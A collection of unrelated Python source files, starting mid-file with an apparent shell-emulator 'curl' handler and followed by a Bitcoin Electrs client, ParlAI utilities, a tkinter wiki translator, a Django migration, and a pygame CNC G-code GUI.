full, cmd, = kwargs['full'], kwargs['cmd']
args = full[5:].split(' ')
no_need_arg, require_arg = ['-O'], ['-o']
skip, url, fmt_args = False, '', []
for i in range(0, len(args)):
if skip:
skip = False
continue
if args[i] in require_arg:
try:
fmt_args.append([args[i], args[i+1]])
except IndexError:
fmt_args.append([args[i]])
skip = True
elif args[i] in no_need_arg:
fmt_args.append([args[i]])
else:
url = args[i]
for i in fmt_args:
if any(elem in require_arg for elem in i):
if len(i) == 1:
self.write('curl: option {}: requires parameter\n'.format(i[0]))
return
if len(url) == 0:
self.write('curl: no URL specified!\n')
return
if url.startswith('/'):
self.write('curl: Remote file name has no length!\n')
return
# -------------------------------------------------------------------------------------------------------------
# End of Conditions
# -------------------------------------------------------------------------------------------------------------
# TODO: VFS, HASH, Accepted
if 'http://' not in url or 'https://' not in url:
url = 'http://' + url
try:
opt = [i for i in fmt_args if '-o' in i][0]
file_name = opt[1]
except IndexError:
file_name = url.split('/')[-1]
# Write The curl output as shown below
"""
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
"""
try:
self.download(url, file_name)
except requests.exceptions.ConnectionError:
# Do Some Fake Loop To Wait
print('z')
return
except IsADirectoryError:
self.write('Warning: Failed to create the file dd: Is a directory\n')
self.write('curl: (23) Failed writing received data to disk/application\n')
return
head = self.vfs.head
obj = FileObject(file_name, 'rwxrwxrwwx', head.loc + file_name)
head.add_obj(obj)
return None
@staticmethod
def download(url, file_name):
with open(file_name, 'wb') as file:
response = requests.get(url, verify=False, timeout=2)
file.write(response.content)
| StarcoderdataPython |
4813233 | <gh_stars>1-10
import json
import socket
from hashlib import sha256
import time
from bitcoin.wallet import CBitcoinAddress
import bitcoin
import binascii
from typing import Dict, List
from config import Config, NETWORK_TESTNET, NETWORK_MAINNET
import logging
def _request(method, *args):
return {'method': method, 'params': list(args)}
def _to_scripthash(bitcoin_address: CBitcoinAddress) -> str:
'''
@return: hex string.
'''
script_pubkey = bitcoin_address.to_scriptPubKey()
h = sha256(script_pubkey).digest()
h = h[::-1]
return binascii.hexlify(h).decode("ascii")
class ElectrsClient:
def __init__(self, addr):
self.s = socket.create_connection(addr)
self.f = self.s.makefile('r')
self.id = 0
version_response = self._call(_request("server.version", "", "1.4"))
assert version_response.get(
"error") is None, "Failed to nogatiate veresion"
def close(self):
self.f.close()
self.s.close()
def _call(self, request):
request['id'] = self.id
request['jsonrpc'] = '2.0'
self.id += 1
msg = json.dumps(request) + '\n'
self.s.sendall(msg.encode('ascii'))
response = json.loads(self.f.readline())
return response
def _batch_call(self, requests):
for request in requests:
request['id'] = self.id
request['jsonrpc'] = '2.0'
self.id += 1
msg = json.dumps(requests) + '\n'
self.s.sendall(msg.encode('ascii'))
responses = json.loads(self.f.readline())
return responses
def get_transactions(self, txids: List[str]):
"""
@return: List of transactions in JSON in the same order as the input.
"""
requests = [_request("blockchain.transaction.get",
txid, True) for txid in txids]
responses = self._batch_call(requests)
txs = []
for i, response in enumerate(responses):
assert response.get("error") is None, "error: {}".format(
response.get['error'])
# Requests order must matches the reponses order
assert response["result"]["txid"] == txids[i]
txs.append(response["result"])
return txs
def existaddress(self, bitcoin_address: CBitcoinAddress) -> bool:
response = self._call(_request("blockchain.scripthash.get_history",
_to_scripthash(bitcoin_address)))
assert response.get('error') is None, "error: {}".format(
response.get['error'])
return len(response['result']) > 0
def get_history(self, bitcoin_address: CBitcoinAddress) -> List[str]:
"""
@return: A list of txid of confirmed transaction in blockchain order (e.g 2094994, 2094998, ... ).
txid is in hex string e.g "68278fbf26dfb5e280ba298cf621775c6a20fbf5606dd6ce9443d314950cb2f7" for testnet.
"""
response = self._call(_request("blockchain.scripthash.get_history",
_to_scripthash(bitcoin_address)))
txids = []
for r in response['result']:
if r["height"] > 0:
txids.append(r["tx_hash"])
return txids
def get_mempool(self, bitcoin_address: CBitcoinAddress) -> List[str]:
"""
@return: A list of txid of transaction in mempool.
"""
response = self._call(_request("blockchain.scripthash.get_history",
_to_scripthash(bitcoin_address)))
txids = []
for r in response['result']:
if r["height"] == 0:
txids.append(r["tx_hash"])
return txids
def fee_estimates(self):
"""
Get an object where the key is the confirmation target (in number of blocks) and the value is the estimated feerate (in sat/vB).
The available confirmation targets are 1-25, 144, 504 and 1008 blocks.
@return: exmaple { "1": 87.882, "6": 20.0, "144": 1.027 }
"""
n_blocks_list = [1, 6, 144]
requests = [_request("blockchain.estimatefee", n_blocks)
for n_blocks in n_blocks_list]
responses = self._batch_call(requests)
feerates = {}
for i in range(len(responses)):
feerates[str(n_blocks_list[i])] = responses[i]["result"]*100000
return feerates
def get_rawtransaction(self, txid: str) -> str:
"""
@txid: The transaction hash as a hexadecimal string.
@return: tx in hexadecimal string.
"""
response = self._call(_request("blockchain.transaction.get", txid, False))
assert response.get('error') is None, "error: {}".format(
response.get['error'])
return response["result"]
def creact_electrs_client() -> ElectrsClient:
'''
Caller owns the returned object, and it should be closed when no longer in used.
'''
assert Config.TestNetElectrsHostAndPort
if Config.Network == NETWORK_TESTNET:
return ElectrsClient(Config.TestNetElectrsHostAndPort)
else:
return ElectrsClient(Config.ElectrsHostAndPort)
| StarcoderdataPython |
1622082 | <reponame>mohan-chinnappan-n/ParlAI
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
File for miscellaneous utility functions and constants.
"""
# some of the utility methods are helpful for Torch
try:
import torch
__TORCH_AVAILABLE = True
except ImportError:
__TORCH_AVAILABLE = False
"""Near infinity, useful as a large penalty for scoring when inf is bad."""
NEAR_INF = 1e20
def set_namedtuple_defaults(namedtuple, default=None):
"""
Set *all* of the fields for a given nametuple to a singular value.
Modifies the tuple in place, but returns it anyway.
More info:
https://stackoverflow.com/a/18348004
:param namedtuple: A constructed collections.namedtuple
:param default: The default value to set.
:returns: the modified namedtuple
"""
namedtuple.__new__.__defaults__ = (default,) * len(namedtuple._fields)
return namedtuple
def padded_tensor(items, pad_idx=0, use_cuda=False, left_padded=False, max_len=None):
"""
Create a right-padded matrix from an uneven list of lists.
Returns (padded, lengths), where padded is the padded matrix, and lengths
is a list containing the lengths of each row.
Matrix is right-padded (filled to the right) by default, but can be
left padded if the flag is set to True.
Matrix can also be placed on cuda automatically.
:param list[iter[int]] items: List of items
:param bool sort: If True, orders by the length
:param int pad_idx: the value to use for padding
:param bool use_cuda: if true, places `padded` on GPU
:param bool left_padded:
:param int max_len: if None, the max length is the maximum item length
:returns: (padded, lengths) tuple
:rtype: (Tensor[int64], list[int])
"""
# hard fail if we don't have torch
if not __TORCH_AVAILABLE:
raise ImportError(
"Cannot use padded_tensor without torch; go to http://pytorch.org"
)
# number of items
n = len(items)
# length of each item
lens = [len(item) for item in items]
# max in time dimension
t = max(lens) if max_len is None else max_len
# if input tensors are empty, we should expand to nulls
t = max(t, 1)
if isinstance(items[0], torch.Tensor):
# keep type of input tensors, they may already be cuda ones
output = items[0].new(n, t)
else:
output = torch.LongTensor(n, t)
output.fill_(pad_idx)
for i, (item, length) in enumerate(zip(items, lens)):
if length == 0:
# skip empty items
continue
if not isinstance(item, torch.Tensor):
# put non-tensors into a tensor
item = torch.LongTensor(item)
if left_padded:
# place at end
output[i, t - length :] = item
else:
# place at beginning
output[i, :length] = item
if use_cuda:
output = output.cuda()
return output, lens
def argsort(keys, *lists, descending=False):
"""
Reorder each list in lists by the (descending) sorted order of keys.
:param iter keys: Keys to order by.
:param list[list] lists: Lists to reordered by keys's order.
Correctly handles lists and 1-D tensors.
:param bool descending: Use descending order if true.
:returns: The reordered items.
"""
ind_sorted = sorted(range(len(keys)), key=lambda k: keys[k])
if descending:
ind_sorted = list(reversed(ind_sorted))
output = []
for lst in lists:
# watch out in case we don't have torch installed
if __TORCH_AVAILABLE and isinstance(lst, torch.Tensor):
output.append(lst[ind_sorted])
else:
output.append([lst[i] for i in ind_sorted])
return output
| StarcoderdataPython |
1610850 | import json
import tkinter as tk
from tkinter import ttk
import api
import core
CONFIG = 'config.json'
AUTOSAVE = 'autosave.txt'
TF2_WIKI_API = 'https://wiki.teamfortress.com/w/api.php'
WIKIPEDIA_API = 'https://en.wikipedia.org/w/api.php'
def open_config():
try:
file = open(CONFIG, 'r')
file.close()
except FileNotFoundError:
recreate_config()
finally:
with open(CONFIG, 'r') as file:
return json.load(file)
def recreate_config():
with open(CONFIG, 'w') as file:
json.dump(core.STANDARD_CONFIG, file, indent=4)
def save_config(key, value):
config = open_config()
config[key] = value
with open(CONFIG, 'w') as file:
json.dump(config, file, indent=4)
class ControlPanel(ttk.Frame):
def __init__(self, parent, translate_callback, **kwargs):
ttk.Frame.__init__(self, parent, **kwargs)
self.translate_callback = translate_callback
language = open_config()['language']
api_access = open_config()['api_access']
self.language_label = ttk.Label(self, text='Language: ')
self.language = ttk.Combobox(
self,
width=7,
state='readonly',
values=list(core.LANGUAGES.keys())
)
self.language.set(language)
self.language.bind(
'<<ComboboxSelected>>',
lambda _: self.updated('language', self.language.get())
)
self.var_api = tk.IntVar()
self.api = ttk.Checkbutton(
self, text='Use TF Wiki connection to improve translations',
variable=self.var_api,
command=lambda: self.updated('api_access', self.var_api.get())
)
self.var_api.set(api_access)
self.language_label.grid(column=0, row=0, sticky='nwes')
self.language.grid(column=1, row=0, sticky='nwes', padx=(0, 15))
self.api.grid(column=2, row=0, sticky='nwes')
def updated(self, key, value):
save_config(key, value)
self.translate_callback()
class GUI(tk.Tk):
def __init__(self):
self.context = core.Context(
tf2_api=api.API(TF2_WIKI_API),
wikipedia_api=api.API(WIKIPEDIA_API)
)
self.last_input = ''
super().__init__()
self.title('wikitranslator')
self.protocol('WM_DELETE_WINDOW', self.exit)
self.frame = ttk.Frame(self, padding='3 3 3 3', style='Wat.TFrame')
self.text_input = tk.Text(
self.frame,
width=90, height=40,
wrap='char',
undo=True, maxundo=100
)
self.scrollbar_input = ttk.Scrollbar(
self.frame, orient='vertical', command=self.text_input.yview
)
self.text_output = tk.Text(
self.frame,
width=90, height=40,
wrap='char',
state=tk.DISABLED
)
self.scrollbar_output = ttk.Scrollbar(
self.frame, orient='vertical', command=self.text_output.yview
)
self.control_panel = ControlPanel(
self.frame, self.translate, padding='3 3 3 3'
)
self.frame.grid(column=0, row=0, sticky='nwes')
self.control_panel.grid(column=0, row=0, sticky='nwes')
self.text_input.grid(column=0, row=1, sticky='nwes')
self.scrollbar_input.grid(column=1, row=1, sticky='nwes')
self.text_output.grid(column=2, row=1, sticky='nwes')
self.scrollbar_output.grid(column=3, row=1, sticky='nwes')
self.text_input['yscrollcommand'] = self.scrollbar_input.set
self.text_output['yscrollcommand'] = self.scrollbar_output.set
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.frame.rowconfigure(1, weight=1, minsize=150)
self.frame.columnconfigure(0, weight=2, minsize=400)
self.frame.columnconfigure(2, weight=2, minsize=400)
self.bind('<Control-Z>', self.text_input.edit_undo)
self.bind('<Control-Shift-Z>', self.text_input.edit_redo)
self.after(1000, self.input_tick)
def exit(self):
if self.text_output.get('1.0', 'end') != '':
self.save_file()
self.destroy()
self.quit()
def input_tick(self):
current_input = self.text_input.get('1.0', 'end').strip()
if current_input != self.last_input:
self.last_input = current_input
self.translate()
self.after(1000, self.input_tick)
def save_file(self):
with open(AUTOSAVE, 'ab') as file:
file.write(bytes(self.text_output.get('1.0', 'end'), 'utf-8'))
def translate(self):
translated = self.context.translate(
self.control_panel.language.get(),
self.control_panel.var_api.get(),
self.last_input
)
self.text_output.configure(state=tk.NORMAL)
self.text_output.delete('1.0', 'end')
self.text_output.insert('1.0', '\n\n'.join(translated))
self.text_output.configure(state=tk.DISABLED)
if __name__ == '__main__':
root = GUI()
root.mainloop()
| StarcoderdataPython |
3212210 | # Generated by Django 2.2.1 on 2019-08-31 10:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("core", "0009_activeplugin_enabled")]
operations = [
migrations.RemoveField(model_name="report", name="config"),
migrations.AddField(
model_name="report",
name="theme_config",
field=models.TextField(
blank=True, null=True, verbose_name="Theme config JSON"
),
),
migrations.AddField(
model_name="report",
name="theme_slug",
field=models.CharField(
default="", max_length=200, verbose_name="Theme slug"
),
preserve_default=False,
),
]
| StarcoderdataPython |
3370733 | #!/usr/bin/env python
"CNC GUI basic page switching"
import sys
import os
import pygame
import pigpio
import socket
import linecache
from pygame import *
from pygame.transform import scale
from pygame.locals import *
import math
pygame.warn_unwanted_files
main_dir = os.path.dirname(os.path.abspath("__file__"))
# R G B
WHITE = (255, 255, 255)
DARKGRAY = (150, 150, 150)
BLACK = ( 0, 0, 0)
RED = (255, 0, 0)
GREEN = ( 0, 255, 0)
BLUE = ( 0, 0, 255)
YELLOW = (255, 255, 0)
ORANGE = (255, 128, 0)
PURPLE = (255, 0, 255)
ABLUE = ( 50, 50, 100)
COLOR_ON = (100, 100, 200)
COLOR_OFF= (255, 255, 255)
dstx = 0
dsty = 0
dscale= 1
def main():
init()
global DISPLAYSURF, FPSCLOCK, WINDOWWIDTH, WINDOWHEIGHT, XINV, YINV
global Font
global FDMAR
global dstx,dsty,dscale
dstx,dsty,dscale=getscale(590,540)
get_stpz(dstx,dsty,dscale)
#global gsetting[5]
Font = font.Font(None, 34)
# if image_file is None:
image_file = os.path.join(main_dir, 'data', 'home.png')
margin = 80
view_size = (500, 500)
zoom_view_size = (500, 500)
win_size = (800, 600)
background_color = Color('beige')
WINDOWWIDTH, WINDOWHEIGHT = 800, 600
#XINV, YINV = True, True #@TODO
XINV, YINV = False, False #@TODO
FDMAR = False
pygame.init()
FPSCLOCK = pygame.time.Clock()
#DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH,WINDOWHEIGHT),pygame.FULLSCREEN, 32)
DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH,WINDOWHEIGHT))
# set up key repeating so we can hold down the key to scroll.
#old_k_delay, old_k_interval = pygame.key.get_repeat ()
#pygame.key.set_repeat (500, 30)
try:
#screen = pygame.display.set_mode(win_size,pygame.FULLSCREEN)
screen = pygame.display.set_mode(win_size)
screen.fill(background_color)
pygame.display.flip()
image = pygame.image.load(image_file).convert()
image_w, image_h = image.get_size()
if image_w < view_size[0] or image_h < view_size[1]:
print ("The source image is too small for this example.")
print ("A %i by %i or larger image is required." % zoom_view_size)
return
regions = pygame.Surface(win_size, 0, 24)
pygame.display.flip()
#screen.set_clip((margin, margin, zoom_view_size[0], zoom_view_size[1]))
view_rect = Rect(0, 0, view_size[0], view_size[1])
#scale(image.subsurface(view_rect), zoom_view_size,
# screen.subsurface(screen.get_clip()))
#pygame.display.flip()
#pygame.mouse.set_visible(False) #@TODO
screenHome()
# the direction we will scroll in.
direction = None
clock = pygame.time.Clock()
clock.tick()
going = True
finally:
#pygame.key.set_repeat (old_k_delay, old_k_interval)
print 'GOOD BYE'
def showtext(win, pos, text, color, bgcolor):
#Render Font line
if(bgcolor=='NO'):
textimg = Font.render(text, 1, color)
else:
textimg = Font.render(text, 1, color, bgcolor)
win.blit(textimg, pos)
return pos[0] + textimg.get_width() + 5, pos[1]
def showtextr(win, pos, angle, text, color, bgcolor):
#Render Font line
if(bgcolor=='NO'):
textimg = Font.render(text, 1, color)
else:
textimg = Font.render(text, 1, color, bgcolor)
textimg=pygame.transform.rotate(textimg, angle)
win.blit(textimg, pos)
return pos[0] + textimg.get_width() + 5, pos[1]
def getset():
#read setting from file and return setting array
fo = open("setting.txt", "r")
sett=["12","4","3","2","0"]
count=0;
for line in fo:
sett[count]=line[:-1]
count+=1
fo.close()
return sett
def getshset(setfile):
#read setting from file and return setting array
fo = open(setfile, "r")
sett=["12","4","3","2","0"]
count=1;
for line in fo:
sett[count]=line[:-1]
count+=1
sett[0]=str(count)
fo.close()
return sett
def filelines(x, y, nfile, line_off, line_count, line_length, line_selected):
fo = open(nfile, "r")
i=y
lines=1
liner=' '
for line in fo:
line=line[0:(line_length+1)]
if (lines > line_off) and (lines< (line_off + line_count + 1)) :
if (lines == line_selected + line_off):
showtextr(DISPLAYSURF, (x,i),0,line[:-1], COLOR_OFF, ABLUE)
liner=line[:-1]
else:
showtextr(DISPLAYSURF, (x,i),0,line[:-1], COLOR_OFF,'NO')
i=i+25
lines+=1
fo.close()
return liner
def wline(nfile, line_str):
with open(nfile, "a" ) as fo:
fo.write(line_str)
fo.close()
def printset(s):
#Printing setting to file
fo = open("setting.txt", "w+")
gcon = open("gconfig1.h", "w+")
for i in range(len(s)):
fo.write(s[i]+'\n')
gcon.write("/*\n* gconfig.h\n* Created by: Adros Systems\n* Author: sdagar\n*/\n")
gcon.write("#ifndef GCONFIG_H_\n")
gcon.write("#define GCONFIG_H_\n")
gcon.write("#define FINE 100\n")
gcon.write("#define SPEED_R 12\n")
gcon.write("#define SPEED_N 6\n")
gcon.write("#define SPEED_DIF_X "+str(float(s[2])/10)+"\n")
gcon.write("#define SPEED_DIF_Y "+str(float(s[3])/10)+"\n")
gcon.write("#define SX 1\n")
gcon.write("#define SY 1\n")
gcon.write("#define KX 5\n")
gcon.write("#define KY 5\n")
gcon.write("#define NX (SPEED_R*(KX+1)/(2*SPEED_DIF_X))+1\n")
gcon.write("#define NY (SPEED_R*(KX+1)/(2*SPEED_DIF_X))+1\n")
gcon.write("#define FL (int)(NX>NY?NX:NY)\n")
gcon.write("#define MAXT 5\n")
gcon.write("#endif")
def getscale(L,H):
#Generating Scale and starting point for gcode
L=float(L)
H=float(H)
stp_file=os.path.join(main_dir, 'motion' ,'step1.txt')
g = open(stp_file, "r")
sx=1.176
sy=1
x=0
y=0
xMx=1.0
xMn=-1.0
yMx=1.0
yMn=-1.0
for line in g:
if (line=='3\n'):
y=y+sy
elif (line=='4\n'):
x=x-sx
y=y+sy
elif (line=='7\n'):
y=y-sy
elif (line=='8\n'):
x=x+sx
y=y-sy
elif (line=='1\n'):
x=x+sx
elif (line=='2\n'):
x=x+sx
y=y+sy
elif (line=='5\n'):
x=x-sx
elif (line=='6\n'):
x=x-sx
y=y-sy
#pygame.draw.line(DISPLAYSURF,BLACK,(xb,yb),(x,y),2)
if (x>xMx):
xMx=x
if (x<xMn):
xMn=x
if (y>yMx):
yMx=y
if (y<yMn):
yMn=y
scx = L/(xMx-xMn)
scy = H/(yMx-yMn)
scale = scx
if (scx>scy):
scale = scy
if (scale>0.756):
scale = 0.756
stx = int(-xMn*L/(xMx-xMn))
sty = int(-yMn*H/(yMx-yMn))
g.close()
return [stx,sty,scale]
def gdraw(stx,sty,scale,col):
#Draw Gcode on screen
#sc=getscale(590,540)
sclx=1.176
scly=1
xoff=10.0;
yoff=550.0;
togg=False;
#print (sc[0],sc[1],sc[2])
stp_file=os.path.join(main_dir, 'motion' ,'step1.txt')
g = open(stp_file, "r")
sx=scale*sclx
sy=scale*scly
x=stx+xoff
y=yoff-sty
xb=stx+xoff
yb=yoff-sty
for line in g:
if (line=='3\n'):
y=y-sy
elif (line=='4\n'):
x=x-sx
y=y-sy
elif (line=='7\n'):
y=y+sy
elif (line=='8\n'):
x=x+sx
y=y+sy
elif (line=='1\n'):
x=x+sx
elif (line=='2\n'):
x=x+sx
y=y-sy
elif (line=='5\n'):
x=x-sx
elif (line=='6\n'):
x=x-sx
y=y+sy
elif (line=='9\n'):
togg=True
elif (line=='0\n'):
togg=False
if (togg==True):
colo = col
else:
colo = DARKGRAY
if not ((int(xb)==int(x)) and (int(yb)==int(y))):
pygame.draw.line(DISPLAYSURF,colo,(int(xb),int(yb)),(int(x),int(y)),3)
xb=x
yb=y
pygame.display.update()
g.close()
def get_stpz(stx,sty,scale):
#Draw Gcode on screen
#sc=getscale(590,540)
sclx=1.176
scly=1
xoff=10.0;
yoff=550.0;
togg=False;
count=0;
#print (sc[0],sc[1],sc[2])
stp_file=os.path.join(main_dir, 'motion' ,'step1.txt')
stz_file=os.path.join(main_dir, 'motion' ,'stepz.txt')
g = open(stp_file, "r")
gz = open(stz_file, "w")
sx=scale*sclx
sy=scale*scly
x=stx+xoff
y=yoff-sty
xb=stx+xoff
yb=yoff-sty
print "sx = "+str(sx)+"sy =" + str(sy)
for line in g:
if (line=='3\n'):
y=y-sy
elif (line=='4\n'):
x=x-sx
y=y-sy
elif (line=='7\n'):
y=y+sy
elif (line=='8\n'):
x=x+sx
y=y+sy
elif (line=='1\n'):
x=x+sx
elif (line=='2\n'):
x=x+sx
y=y-sy
elif (line=='5\n'):
x=x-sx
elif (line=='6\n'):
x=x-sx
y=y+sy
elif (line=='9\n'):
gz.write('9 0\n')
elif (line=='0\n'):
gz.write('0 0\n')
if ((int(xb)==(int(x)+1)) and (int(yb)==(int(y)))):
gz.write('1 ')
gz.write(str(count))
gz.write('\n')
if ((int(xb)==(int(x)+1)) and (int(yb)==(int(y)+1))):
gz.write('2 ')
gz.write(str(count))
gz.write('\n')
if ((int(xb)==(int(x))) and (int(yb)==(int(y)+1))):
gz.write('3 ')
gz.write(str(count))
gz.write('\n')
if ((int(xb)==(int(x)-1)) and (int(yb)==(int(y)+1))):
gz.write('4 ')
gz.write(str(count))
gz.write('\n')
if ((int(xb)==(int(x)-1)) and (int(yb)==(int(y)))):
gz.write('5 ')
gz.write(str(count))
gz.write('\n')
if ((int(xb)==(int(x)-1)) and (int(yb)==(int(y)-1))):
gz.write('6 ')
gz.write(str(count))
gz.write('\n')
if ((int(xb)==(int(x))) and (int(yb)==(int(y)-1))):
gz.write('7 ')
gz.write(str(count))
gz.write('\n')
if ((int(xb)==(int(x)+1)) and (int(yb)==(int(y)-1))):
gz.write('8 ')
gz.write(str(count))
gz.write('\n')
count=count+1
xb=x
yb=y
#pygame.display.update()
g.close()
gz.close()
def gdraw2(stx,sty,scale,col):
#Draw Gcode on screen
#sc=getscale(590,540)
sclx=1.176
scly=1
xoff=10.0;
yoff=550.0;
togg=False;
#print (sc[0],sc[1],sc[2])
stp_file=os.path.join(main_dir, 'motion' ,'stepz.txt')
g = open(stp_file, "r")
#sx=scale*sclx
sx=-1
#sy=scale*scly
sy=1
x=stx+xoff
y=yoff-sty
xb=stx+xoff
yb=yoff-sty
for line1 in g:
line,lineC = line1.split()
if (line=='3'):
y=y-sy
elif (line=='4'):
x=x-sx
y=y-sy
elif (line=='7'):
y=y+sy
elif (line=='8'):
x=x+sx
y=y+sy
elif (line=='1'):
x=x+sx
elif (line=='2'):
x=x+sx
y=y-sy
elif (line=='5'):
x=x-sx
elif (line=='6'):
x=x-sx
y=y+sy
elif (line=='9'):
togg=True
elif (line=='0'):
togg=False
if (togg==True):
colo = col
else:
colo = DARKGRAY
if not ((int(xb)==int(x)) and (int(yb)==int(y))):
pygame.draw.line(DISPLAYSURF,colo,(int(xb),int(yb)),(int(x),int(y)),3)
xb=x
yb=y
pygame.display.update()
g.close()
def dgdraw(stx,sty,scale,linS,linE):
#Draw Diffrential Gcode on screen
sclx=1.176
scly=1
togg=False
stp_file=os.path.join(main_dir, 'motion' ,'stepd.txt')
sx=scale*sclx
sy=scale*scly
x=stx+dgdraw.xoff
y=dgdraw.yoff-sty
xb=stx+dgdraw.xoff
yb=dgdraw.yoff-sty
#linecache.checkcache(stp_file)
if linE == (-1) :
end_tourch(stx,sty,scale)
return
for ln in range(linS,linE):
line = linecache.getline(stp_file, ln)
if (line=='3\n'):
y=y-sy
elif (line=='4\n'):
x=x-sx
y=y-sy
elif (line=='7\n'):
y=y+sy
elif (line=='8\n'):
x=x+sx
y=y+sy
elif (line=='1\n'):
x=x+sx
elif (line=='2\n'):
x=x+sx
y=y-sy
elif (line=='5\n'):
x=x-sx
elif (line=='6\n'):
x=x-sx
y=y+sy
elif (line=='9\n'):
togg=True
elif (line=='0\n'):
togg=False
if (togg==True):
colo = BLUE
else:
colo = YELLOW
if not ((int(xb)==int(x)) and (int(yb)==int(y))):
pygame.draw.line(DISPLAYSURF,colo,(int(xb),int(yb)),(int(x),int(y)),3)
xb=x
yb=y
pygame.display.update()
dgdraw.xoff=xb-stx;
dgdraw.yoff=yb+sty;
def dgdraw2(stx,sty,scale,linS,linE):
#Draw Diffrential Gcode on screen
sclx=1.176
scly=1
togg=False
stp_file=os.path.join(main_dir, 'motion' ,'stepz.txt')
sx=-1#scale*sclx
sy=1#scale*scly
x=stx+dgdraw2.xoff
y=dgdraw2.yoff-sty
xb=stx+dgdraw2.xoff
yb=dgdraw2.yoff-sty
#linecache.checkcache(stp_file)
if linE == (-1) :
end_tourch(stx,sty,scale)
return
for ln in range(linS,linE):
line = linecache.getline(stp_file, ln)
if not line: break
line1,line2 = line.split()
dgdraw2.line_n = int(line2)
if(int(line2)>linE):
break
if (line1=='3'):
y=y-sy
elif (line1=='4'):
x=x-sx
y=y-sy
elif (line1=='7'):
y=y+sy
elif (line1=='8'):
x=x+sx
y=y+sy
elif (line1=='1'):
x=x+sx
elif (line1=='2'):
x=x+sx
y=y-sy
elif (line1=='5'):
x=x-sx
elif (line1=='6'):
x=x-sx
y=y+sy
elif (line1=='9'):
togg=True
elif (line1=='0'):
togg=False
if (togg==True):
colo = BLUE
else:
colo = YELLOW
if not ((int(xb)==int(x)) and (int(yb)==int(y))):
pygame.draw.line(DISPLAYSURF,colo,(int(xb),int(yb)),(int(x),int(y)),3)
xb=x
yb=y
pygame.display.update()
dgdraw2.xoff=xb-stx;
dgdraw2.yoff=yb+sty;
linecache.clearcache()
def update_tourch(stx,sty,scale):
update_tourch.ls.sendall('1')
linN =update_tourch.ls.recv(8)
update_tourch.ls.sendall('0')
#print 'line No from Server:',(linN.strip('\0'))
#print 'line No from Server:',int(linN.strip('\0'))
#dgdraw.xoff=10.0;
#dgdraw.yoff=550.0;
#dgdraw(stx,sty,scale,1,int(linN.strip('\0')))
dgdraw2.xoff=10.0;
dgdraw2.yoff=550.0;
dgdraw2.line_n=0;
line_c = int(linN.strip('\0'))
if (line_c >= dgdraw2.line_n) or line_c == -1 :
dgdraw2(stx,sty,scale,1,line_c)
if ( int(linN.strip('\0'))==(-1)):
return False
else:
return True
def pause_tourch():
update_tourch.ls.sendall('2')
linN =update_tourch.ls.recv(8)
print 'Status:'+linN
if linN.strip('\0') == 'RESUME':
print 'YES'
return True
if linN.strip('\0') == 'PAUSE':
return False
def stop_tourch():
update_tourch.ls.sendall('16')
linN =update_tourch.ls.recv(8)
print 'Status:'+linN
def end_tourch(dstx,dsty,dscale):
update_tourch.ls.sendall('16')
gdraw2(dstx,dsty,dscale,BLUE)
print 'Status: END'
def circle2g(setting):
#Radius
fo = open(os.path.join("gcode" ,"circle.txt"), "w+")
print "GCODE Written"
fo.write('G%d X%d Y%d I%d J%d\n' % (2,setting[0],0,setting[0]/2,0))
fo.write('G%d X%d Y%d I%d J%d\n' % (2,-setting[0],0,-setting[0]/2,0))
fo.write('END')
# Close opend file
fo.close()
def rectangle2g(setting):
#Length, Hieght
fo = open(os.path.join("gcode" ,"rect.txt"), "w+")
print "GCODE Written"
fo.write('G%d X%d Y%d\n' % (1,setting[0],0))
fo.write('G%d X%d Y%d\n' % (1,0,setting[1]))
fo.write('G%d X%d Y%d\n' % (1,-setting[0],0))
fo.write('G%d X%d Y%d\n' % (1,0,-setting[1]))
fo.write('END')
# Close opend file
fo.close()
def rhombus2g(setting):
#Diagonal_x,Diagonal_y
fo = open(os.path.join("gcode" ,"rhom.txt"), "w+")
print "GCODE Written"
fo.write('G%d X%d Y%d\n' % (1,setting[0]/2,setting[1]/2))
fo.write('G%d X%d Y%d\n' % (1,-setting[0]/2,setting[1]/2))
fo.write('G%d X%d Y%d\n' % (1,-setting[0]/2,-setting[1]/2))
fo.write('G%d X%d Y%d\n' % (1,setting[0]/2,-setting[1]/2))
fo.write('END')
# Close opend file
fo.close()
def triangle2g(setting):
#Base,Hieght,vertex_x
fo = open(os.path.join("gcode" ,"tri.txt"), "w+")
print "GCODE Written"
fo.write('G%d X%d Y%d\n' % (1,setting[0],0))
fo.write('G%d X%d Y%d\n' % (1,setting[2]-setting[0],setting[1]))
fo.write('G%d X%d Y%d\n' % (1,-setting[2],-setting[1]))
fo.write('END')
# Close opend file
fo.close()
def polygon2g(setting):
#N,Radius
fo = open(os.path.join("gcode" ,"poly.txt"), "w+")
print "GCODE Written"
angle = 0
for i in range(setting[0]):
d = [setting[1]*(math.cos(angle+2*math.pi/setting[0])-math.cos(angle)),setting[1]*(math.sin(angle+2*math.pi/setting[0])-math.sin(angle))]
fo.write('G%d X%f Y%f\n' % (1,d[0],d[1]))
angle += 2*math.pi/setting[0]
fo.write('END')
# Close opend file
fo.close()
def star2g(setting):
#N,Inner_R,Outer_R
fo = open(os.path.join("gcode" ,"star.txt"), "w+")
print "GCODE Written"
angle = 0
R1 = setting[1]
R2 = setting[2]
for i in range(2*setting[0]):
d = [R1*math.cos(angle+math.pi/setting[0])-R2*math.cos(angle),R1*math.sin(angle+math.pi/setting[0])-R2*math.sin(angle)]
fo.write('G%d X%f Y%f\n' % (1,d[0],d[1]))
angle += math.pi/setting[0]
R=R1
R1=R2
R2=R
fo.write('END')
# Close opend file
fo.close()
def screenCali():
#Home screen to salect basic options
image_arr = [os.path.join(main_dir, 'data', 'cr.png'), os.path.join(main_dir, 'data', 'cl.png'), os.path.join(main_dir, 'data', 'ct.png'), os.path.join(main_dir, 'data', 'cb.png')]
for i in range(4):
SIMAGE = pygame.image.load(image_arr[i])
DISPLAYSURF.blit(SIMAGE, (0, 0))
loop = True
pygame.display.update()
while loop :
event = pygame.event.wait()
if event.type == QUIT:
pygame.quit()
sys.exit()
elif event.type == KEYUP:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
elif event.type == MOUSEBUTTONUP:
screenNeedsRedraw = True # screen should be redrawn
loop=False
